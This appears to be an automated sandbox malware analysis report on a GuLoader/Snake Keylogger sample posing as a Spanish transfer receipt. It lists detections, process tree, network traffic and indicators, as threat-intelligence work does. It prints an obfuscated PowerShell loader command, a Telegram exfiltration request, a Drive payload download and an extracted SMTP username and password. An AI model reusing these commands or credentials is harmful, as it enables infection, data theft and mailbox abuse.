Edit tour

Windows Analysis Report
justificante de transferencia09454545.exe

Overview

General Information

Sample name:	justificante de transferencia09454545.exe
Analysis ID:	1637019
MD5:	3cd2f0506c8504484bb4cbb46a00b939
SHA1:	e2330873735bd34a0d65c54ab718cc66d4a9a18d
SHA256:	9a695a466508dfa3be2f7749a0dc12f10b4769a4475d14556371c98f66fc0b68
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Found suspicious powershell code related to unpacking or dynamic code loading

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

justificante de transferencia09454545.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\justificante de transferencia09454545.exe" MD5: 3CD2F0506C8504484BB4CBB46A00B939)

powershell.exe (PID: 6404 cmdline: "powershell.exe" -windowstyle minimized "$Gradslignings135=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Fangsternes.Ora';$Kita=$Gradslignings135.SubString(52858,3);.$Kita($Gradslignings135)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 5272 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

svchost.exe (PID: 1328 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "federico@extintoresdemir.com", "Password": "s46S2&4+", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.1326076402.000000000A3AC000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000B.00000002.2187374741.0000000004C1C000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 5272	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 5272	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 216.58.212.142, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5272, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49692

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6404, TargetFilename: C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\klovsyges\Affinitatively\justificante de transferencia09454545.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Gradslignings135=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Fangsternes.Ora';$Kita=$Gradslignings135.SubString(52858,3);.$Kita($Gradslignings135)", CommandLine: "powershell.exe" -windowstyle minimized "$Gradslignings135=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Fangsternes.Ora';$Kita=$Gradslignings135.SubString(52858,3);.$Kita($Gradslignings135)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\justificante de transferencia09454545.exe", ParentImage: C:\Users\user\Desktop\justificante de transferencia09454545.exe, ParentProcessId: 6388, ParentProcessName: justificante de transferencia09454545.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Gradslignings135=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Fangsternes.Ora';$Kita=$Gradslignings135.SubString(52858,3);.$Kita($Gradslignings135)", ProcessId: 6404, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1328, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T10:07:36.948598+0100	2803305	3	Unknown Traffic	192.168.2.7	49697	104.21.112.1	443	TCP
2025-03-13T10:07:42.884872+0100	2803305	3	Unknown Traffic	192.168.2.7	49701	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T10:07:31.594264+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49694	158.101.44.242	80	TCP
2025-03-13T10:07:34.828726+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49694	158.101.44.242	80	TCP
2025-03-13T10:07:37.578677+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49698	158.101.44.242	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T10:07:24.491820+0100	2803270	2	Potentially Bad Traffic	192.168.2.7	49692	216.58.212.142	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T10:08:00.578585+0100	1810007	1	Potentially Bad Traffic	192.168.2.7	49712	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: justificante de transferencia09454545.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\klovsyges\Affinitatively\justificante de transferencia09454545.exe

Avira: detection malicious, Label: DR/AVI.Agent.eoaaj

Found malware configuration

Source: 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "federico@extintoresdemir.com", "Password": "s46S2&4+", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\klovsyges\Affinitatively\justificante de transferencia09454545.exe

ReversingLabs: Detection: 66%

Multi AV Scanner detection for submitted file

Source: justificante de transferencia09454545.exe	Virustotal: Detection: 73%			Perma Link
Source: justificante de transferencia09454545.exe	ReversingLabs: Detection: 66%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.7% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: justificante de transferencia09454545.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49695 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 216.58.212.142:443 -> 192.168.2.7:49692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.7:49693 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49712 version: TLS 1.2

Source: justificante de transferencia09454545.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Code function: 0_2_00406167 FindFirstFileA,FindClose,	0_2_00406167
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405705
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\justificante de transferencia09454545.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2105F45Dh	11_2_2105F2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2105F45Dh	11_2_2105F4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2105FC19h	11_2_2105F961

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49712 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2014/03/2025%20/%2010:37:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: checkip.dyndns.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49698 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49694 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49692 -> 216.58.212.142:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49697 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1vbx-lNFO9i6ppihU_F4J_NzmQJUSHq2- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1vbx-lNFO9i6ppihU_F4J_NzmQJUSHq2-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49695 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1vbx-lNFO9i6ppihU_F4J_NzmQJUSHq2- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1vbx-lNFO9i6ppihU_F4J_NzmQJUSHq2-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2014/03/2025%20/%2010:37:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 13 Mar 2025 09:08:00 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: powershell.exe, 00000001.00000002.1321322749.00000000077BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000001.00000002.1321322749.0000000007817000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftEW
Source: svchost.exe, 00000004.00000002.2190147360.0000025475600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: justificante de transferencia09454545.exe, justificante de transferencia09454545.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: justificante de transferencia09454545.exe, justificante de transferencia09454545.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.1318798698.0000000006209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1315720582.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021281000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 0000000B.00000002.2204924421.0000000022341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000001.00000002.1315720582.00000000051A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.1315720582.00000000052F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 0000000B.00000002.2203518300.0000000021366000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
